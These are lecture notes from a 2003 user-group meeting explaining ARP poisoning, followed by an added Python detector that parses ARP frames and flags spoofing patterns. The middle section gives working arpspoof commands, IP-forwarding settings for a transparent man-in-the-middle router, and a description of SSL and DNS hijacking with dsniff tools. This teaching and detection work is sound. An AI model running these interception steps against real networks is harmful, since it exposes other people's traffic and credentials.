ARP Poison Lecture - UUSC Meeting 05.01.03
******************************************

Facts about ARP:

  o ARP maps 48-bit MAC addresses to 32-bit IP addresses.
  o There are two expected kinds of ARP:
      * unicast solicited replies
      * broadcast requests
  o Per the ARP RFC, ARP will also accept:
      * broadcast replies
      * unicast requests
  o ARP is dynamic and has the following timers:
      * solicited replies   - 20 minutes
      * unsolicited requests - 5 minutes
  o There is no authentication in ARP.
  o The latest ARP entry updates the cache.
  o Any host can send ARP updates on behalf of any other host.


ARP Related commands

The arp command
----------------------

The arp command is part of the Solaris OS. It enables a host to add a
static entry (-s) to its ARP cache and also to publish that entry to the
broadcast address.

Do not be misled about static entries. They do not keep a static address
mapping. All they do is keep a static address entry in the ARP table that
will be updated by the last ARP update for that entry.

  # arp -h
  arp: illegal option -- h
  Usage: arp hostname
         arp -a [-n]
         arp -d hostname
         arp -s hostname ether_addr [temp] [pub] [trail]
         arp -f filename

To add a static published entry:

  server2# arp -s longbeach 8:0:20:a:b:c pub

The resulting packet:

  ETHER:  ----- Ether Header -----
  ETHER:
  ETHER:  Packet 5 arrived at 13:45:33.26
  ETHER:  Packet size = 42 bytes
  ETHER:  Destination = ff:ff:ff:ff:ff:ff, (broadcast)
  ETHER:  Source      = 8:0:20:ff:b3:c5, Sun       <- ethernet address of server2
  ETHER:  Ethertype = 0806 (ARP)
  ETHER:
  ARP:  ----- ARP/RARP Frame -----
  ARP:
  ARP:  Hardware type = 1
  ARP:  Protocol type = 0800 (IP)
  ARP:  Length of hardware address = 6 bytes
  ARP:  Length of protocol address = 4 bytes
  ARP:  Opcode 1 (ARP Request)                     <- unsolicited ARP request
  ARP:  Sender's hardware address = 8:0:20:a:b:c   <- published address of longbeach
  ARP:  Sender's protocol address = 12.22.215.65, longbeach
  ARP:  Target hardware address = ?
  ARP:  Target protocol address = 12.22.215.65, longbeach
  ARP:

The previous ARP frame from server2 will update all hosts on the broadcast
address with an ARP entry of 8:0:20:a:b:c for host longbeach. The host
longbeach will discard the request as it already has its own static
ethernet address.


The arpspoof command
-----------------------------

The arpspoof command is part of the dsniff suite of utilities and can be
downloaded from sunfreeware.com. The arpspoof command sends out a
persistent ARP broadcast to keep all hosts with a poisoned entry.

  server2# arpspoof router1

In the previous example, arpspoof will send out a broadcast reply to the
subnet (unexpected condition) telling all hosts that the ethernet address
of router1 is actually server2. Every host on the network sending packets
to router1 will send packets with an IP address of router1 and an ethernet
address of server2.

  server2# arpspoof -t longbeach router1

In the previous example, arpspoof will send out a unicast reply to
longbeach telling that host that router1's ethernet address is really
server2's. Any packets that longbeach tries to route to router1 will
actually go to server2.


Transparent Routing
-------------------------

To circumvent the security of a switch, an attacker can redirect traffic
on the switch by sending two arpspoof commands to two hosts, tricking
them:

  server2# arpspoof -t longbeach router1
  server2# arpspoof -t router1 longbeach

***********************
# SAMPLE ARP POISON   *
***********************

# Expected ARP Entries for victim host (station2).
  hme0   10.100.0.254   255.255.255.255          08:00:20:ff:b3:c5
  hme0   10.100.0.1     255.255.255.255          08:00:20:f5:cc:75

# Bogus ARP replies from station1 to broadcast proclaiming IP Address
# of router (10.100.0.254) captured on station2

  ETHER:  ----- Ether Header -----
  ETHER:
  ETHER:  Packet 1 arrived at 14:04:4.29
  ETHER:  Packet size = 60 bytes
  ETHER:  Destination = ff:ff:ff:ff:ff:ff, (broadcast)
  ETHER:  Source      = 8:0:20:f5:cc:75, Sun
  ETHER:  Ethertype = 0806 (ARP)
  ETHER:
  ARP:  ----- ARP/RARP Frame -----
  ARP:
  ARP:  Hardware type = 1
  ARP:  Protocol type = 0800 (IP)
  ARP:  Length of hardware address = 6 bytes
  ARP:  Length of protocol address = 4 bytes
  ARP:  Opcode 2 (ARP Reply)
  ARP:  Sender's hardware address = 8:0:20:f5:cc:75
  ARP:  Sender's protocol address = 10.100.0.254, 10.100.0.254
  ARP:  Target hardware address = ff:ff:ff:ff:ff:ff
  ARP:  Target protocol address = 0.0.0.0, OLD-BROADCAST
  ARP:

# Resulting poisoned ARP cache.

  hme0   10.100.0.1     255.255.255.255          08:00:20:f5:cc:75
  hme0   10.100.0.2     255.255.255.255   SP     08:00:20:ff:e1:a8
  hme0   10.100.0.254   255.255.255.255          08:00:20:f5:cc:75

***********************

These two arpspoof commands will cause both router1 and longbeach to be
tricked into sending traffic to server2. Server2 has to turn on
transparent routing:

  server2# ndd -set /dev/ip ip_forwarding 1
  server2# ndd -set /dev/ip ip_send_redirects 0

This will cause server2 to simply "pass along" an ethernet frame to the
router without sending an ICMP redirect message to the originating host.
All traffic can now be captured on server2, making it a transparent
router.


Further implications:

The dsniff suite of utilities comes with SSL hijacking utilities (webmitm)
and DNS spoofing utilities (dnsspoof). Both of these tools used in
conjunction with arpspoof can force a client to send a DNS lookup to an
attacking host; the attacking host can then redirect the victim to another
SSL enabled website. The other SSL enabled website will start two
sessions. The first SSL session will connect the victim to the attacking
SSL website.
The second SSL session will connect the attacking SSL website to the real
website. The webmitm program decodes all form input, to and from the
victim, that should have been encrypted via https.
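The facts at the top of these notes (two expected kinds of ARP, the RFC also
accepting broadcast replies and unicast requests, no authentication, latest
entry wins) are exactly the conditions a host-side ARP watcher checks for.
The following is an added example, not part of the UUSC lecture or of the
dsniff suite: a small Python parser for raw 42-byte ARP frames plus a
monitor that models a victim's ARP cache and flags replies sent to the
broadcast address, replies nobody asked for, gratuitous requests, a sender
hardware address that differs from the frame's Ethernet source, and any
MAC change for an address already cached. The sample frames are
constructed in memory to mirror the station2 capture above (router
10.100.0.254, station1 08:00:20:f5:cc:75, station2 08:00:20:ff:e1:a8); the
ArpMonitor class, build_arp_frame helper and run_sample function are this
example's own names.

```python
"""Parse raw ARP frames and flag the conditions the lecture notes describe.

Added example, not from the UUSC lecture. Frames are constructed inline
to mirror the snoop capture on station2 in the notes.
"""
import struct

BROADCAST = "ff:ff:ff:ff:ff:ff"
ETHERTYPE_ARP = 0x0806
OP_REQUEST, OP_REPLY = 1, 2


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def parse_arp_frame(frame):
    """Decode Ethernet (14 bytes) + ARP (28 bytes). Returns a dict or None."""
    if len(frame) < 42:
        return None
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack(
        "!HHBBH6s4s6s4s", frame[14:42])
    if htype != 1 or ptype != 0x0800 or hlen != 6 or plen != 4:
        return None
    return {"eth_dst": mac_str(dst), "eth_src": mac_str(src), "op": op,
            "sha": mac_str(sha), "spa": ip_str(spa),
            "tha": mac_str(tha), "tpa": ip_str(tpa)}


def build_arp_frame(eth_dst, eth_src, op, sha, spa, tha, tpa):
    """Construct a minimal ARP frame in memory (used only for sample input)."""
    def mac(s): return bytes(int(x, 16) for x in s.split(":"))
    def ip(s): return bytes(int(x) for x in s.split("."))
    return (struct.pack("!6s6sH", mac(eth_dst), mac(eth_src), ETHERTYPE_ARP)
            + struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                          mac(sha), ip(spa), mac(tha), ip(tpa)))


class ArpMonitor:
    """Model one host's ARP cache and record suspicious frames (hypothetical)."""

    def __init__(self, known=None):
        self.cache = dict(known or {})   # ip -> mac, as the host sees it
        self.pending = set()             # ips this host has sent requests for
        self.alerts = []

    def observe(self, frame, our_mac, our_ip):
        arp = parse_arp_frame(frame)
        if arp is None:
            return
        spa, sha = arp["spa"], arp["sha"]
        if arp["eth_src"] == our_mac:            # our own traffic
            if arp["op"] == OP_REQUEST:
                self.pending.add(arp["tpa"])
            return
        if sha != arp["eth_src"]:
            self.alerts.append(f"sender MAC {sha} differs from frame source {arp['eth_src']}")
        if arp["op"] == OP_REPLY:
            if arp["eth_dst"] == BROADCAST:      # replies are expected unicast
                self.alerts.append(f"reply to broadcast claiming {spa} is {sha}")
            elif spa not in self.pending:        # reply we never asked for
                self.alerts.append(f"unsolicited reply claiming {spa} is {sha}")
            self.pending.discard(spa)
        elif spa == arp["tpa"]:                  # request announcing its own address
            self.alerts.append(f"gratuitous request: {spa} announced as {sha}")
        # RFC 826 merge rule: any ARP packet updates an existing entry for
        # the sender; a packet addressed to us adds one. No authentication,
        # so the latest entry wins, which is the lecture's core point.
        old = self.cache.get(spa)
        if old is not None and old != sha:
            self.alerts.append(f"MAC change for {spa}: {old} -> {sha}")
        if old is not None or arp["tpa"] == our_ip:
            self.cache[spa] = sha


# Constructed addresses taken from the station2 example in the notes.
STATION2_MAC, STATION2_IP = "08:00:20:ff:e1:a8", "10.100.0.2"
ROUTER_MAC, ROUTER_IP = "08:00:20:ff:b3:c5", "10.100.0.254"
STATION1_MAC, STATION1_IP = "08:00:20:f5:cc:75", "10.100.0.1"

SAMPLE_FRAMES = [
    # station2 asks for the router; the router answers with a unicast reply.
    build_arp_frame(BROADCAST, STATION2_MAC, OP_REQUEST,
                    STATION2_MAC, STATION2_IP, "00:00:00:00:00:00", ROUTER_IP),
    build_arp_frame(STATION2_MAC, ROUTER_MAC, OP_REPLY,
                    ROUTER_MAC, ROUTER_IP, STATION2_MAC, STATION2_IP),
    # station1's broadcast reply for 10.100.0.254, as captured in the notes.
    build_arp_frame(BROADCAST, STATION1_MAC, OP_REPLY,
                    STATION1_MAC, ROUTER_IP, BROADCAST, "0.0.0.0"),
    # a published-style gratuitous request for the same address.
    build_arp_frame(BROADCAST, STATION1_MAC, OP_REQUEST,
                    STATION1_MAC, ROUTER_IP, "00:00:00:00:00:00", ROUTER_IP),
]


def run_sample():
    """Replay the constructed frames on station2; return (cache, alerts)."""
    mon = ArpMonitor(known={STATION1_IP: STATION1_MAC})
    for f in SAMPLE_FRAMES:
        mon.observe(f, STATION2_MAC, STATION2_IP)
    return mon.cache, mon.alerts


if __name__ == "__main__":
    cache, alerts = run_sample()
    for ip, mac in sorted(cache.items()):
        print(f"{ip:14} {mac}")
    for a in alerts:
        print("ALERT:", a)
```

After the replay the modelled cache holds 08:00:20:f5:cc:75 for
10.100.0.254, the same poisoned entry shown in the notes, and the monitor
has raised three alerts: the reply to the broadcast address, the MAC change
for the router's IP, and the gratuitous request. A real deployment would
read frames from a promiscuous socket or a pcap file instead of the
constructed list, but the checks themselves are the ones a tool such as an
ARP watcher applies.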